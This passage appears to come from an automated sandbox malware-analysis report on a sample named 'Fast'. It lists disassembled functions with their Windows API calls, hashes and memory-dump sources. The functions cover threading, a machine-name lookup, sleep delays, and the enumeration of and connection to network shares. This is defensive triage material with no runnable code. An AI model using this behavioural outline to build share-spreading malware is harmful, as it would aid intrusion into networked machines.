      Function 00204FA9 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountTick$select
      • String ID:
      • API String ID: 2350311442-0
      • Opcode ID: 1cc57dd7349bc4652b8065e6211caed9bde6cdc84624b65ccd84fd370261f862
      • Instruction ID: 9444583971da963522fc2e9c4d4b5e9d890feec789e30149c3a56ea5e3128c1e
      • Opcode Fuzzy Hash: 1cc57dd7349bc4652b8065e6211caed9bde6cdc84624b65ccd84fd370261f862
      • Instruction Fuzzy Hash: 5E110DB1D1022DABDB14EFA4DC89BDEB7BCAF08700F5041A6A705E6181D6749A458F91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204D68 Relevance: 6.0, APIs: 4, Instructions: 39threadsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNEL32(00000000,00000000,00204B85,00000000,00000000,00000000), ref: 00204D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204DA7
      • CloseHandle.KERNEL32(00000000,?,00204DDD,00000000,00000000,?,00000000,?,00202C9F,0000002C), ref: 00204DB1
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:
      • API String ID: 478055939-0
      • Opcode ID: 6b21ca8182ebf339a40231ff4c46e2254b1afe107fc4e22c7ba3ebf165014289
      • Instruction ID: 618fbcf9c463c8b377b63a90b9366fecb2aedb5dae2fdc8abdb748e3b18ca1ba
      • Opcode Fuzzy Hash: 6b21ca8182ebf339a40231ff4c46e2254b1afe107fc4e22c7ba3ebf165014289
      • Instruction Fuzzy Hash: 9EF03AB1512328FBC721AB65AD4CDEFBEBDEE86B607504005F90592152E7348A019AE2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020349E Relevance: 6.0, APIs: 4, Instructions: 33synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 002034B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002034C3
      • EnterCriticalSection.KERNEL32(?), ref: 002034CA
        • Part of subcall function 002033F3: SetEvent.KERNEL32(00000004), ref: 00203459
        • Part of subcall function 002033F3: ResetEvent.KERNEL32(00000000), ref: 00203462
      • LeaveCriticalSection.KERNEL32(?), ref: 002034DD
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:
      • API String ID: 3328302011-0
      • Opcode ID: a73bdf4dbe92043e66cd009bad9ad625882c28613fab64f4c15bae4403fbef16
      • Instruction ID: c11e4e895ec1da2c0eb0666288780332d095610b77b1baf7a67f6989e11aaf13
      • Opcode Fuzzy Hash: a73bdf4dbe92043e66cd009bad9ad625882c28613fab64f4c15bae4403fbef16
      • Instruction Fuzzy Hash: 98F02732420309FBC7019B68ED88E8A7B7DEF043707104111F402920A3DB71DD148BA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002053E5 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
      Download Yara Rule
      APIs
      • EnterCriticalSection.KERNEL32(00201FEB,00201FDB,00000000,00000000,00205906,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053EE
      • SetEvent.KERNEL32(A0A815FF,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205404
      • SetEvent.KERNEL32(8B0020A0,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205416
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 0020541F
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:
      • API String ID: 2034477713-0
      • Opcode ID: 7fa4530f762cca43d6925de08e28f366aeb7c8b4d1f26d3f537cfbda582607e2
      • Instruction ID: a6eed09a9078792d7f8e5d344caaa47e2fdbcdfb2635a38758e1b63a33120164
      • Opcode Fuzzy Hash: 7fa4530f762cca43d6925de08e28f366aeb7c8b4d1f26d3f537cfbda582607e2
      • Instruction Fuzzy Hash: 38F082721207259BC7305F28EC44897B7A9EF043623215A25E892D31A2D331EC558E60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00202161 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147sleepCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 0020530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00202195), ref: 00205327
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00202195), ref: 00205347
        • Part of subcall function 0020530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00202195), ref: 00205352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 002021D5
      • Sleep.KERNEL32(00002710), ref: 00202297
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-
      • API String ID: 2761037825-4184602625
      • Opcode ID: c4efcd33c97c6611923efa467c16ef7e5724f3e9f03a57d24420271f50f15ce6
      • Instruction ID: e3f68eade94a0eb02299f3b78007174c2f133599cf48f0bbb283cebb03d31a82
      • Opcode Fuzzy Hash: c4efcd33c97c6611923efa467c16ef7e5724f3e9f03a57d24420271f50f15ce6
      • Instruction Fuzzy Hash: 19418272910308BAEB11EBA4DC46FAF777DAF41750F200055FE04A61C3D6709FA48EA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00202084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86sharenetworkCOMMON
      Download Yara Rule
      APIs
      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 002020F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00202126
        • Part of subcall function 00201E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00201E66
        • Part of subcall function 00201E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00201E83
        • Part of subcall function 00201E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 00202046
        • Part of subcall function 00201E10: WNetCloseEnum.MPR(?), ref: 0020205E
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: 3a504d27f534e3deeea0fccaf5484086c350da9ef7e2e122b0fb2da8c5e3fd37
      • Instruction ID: d65350d5fc8f218092af2b97d8e0136ef1dd3093b0012f83f8b2f934c9c65108
      • Opcode Fuzzy Hash: 3a504d27f534e3deeea0fccaf5484086c350da9ef7e2e122b0fb2da8c5e3fd37
      • Instruction Fuzzy Hash: DA213D72518305AFD700DFA9C885A9BB7EDFF48714F40492EF698C2291E771E6188B92
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002024C2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30threadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 002024F8
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocCreateProcessThread
      • String ID: $- " $"
      • API String ID: 490627656-3440885910
      • Opcode ID: 0a2648d7f87729cd85c11189c922b50d38a5381f2b86df86ba1cbcd397224792
      • Instruction ID: bbf703854d70a8155f368ba9867257edaceb474432df32f39600dbb972079714
      • Opcode Fuzzy Hash: 0a2648d7f87729cd85c11189c922b50d38a5381f2b86df86ba1cbcd397224792
      • Instruction Fuzzy Hash: EAF01CB1124309AFCB0CCF55E885D5B7BEAEF88310B14C669F90C8B262E230D8518BA4
      Uniqueness

      Uniqueness Score: -1.00%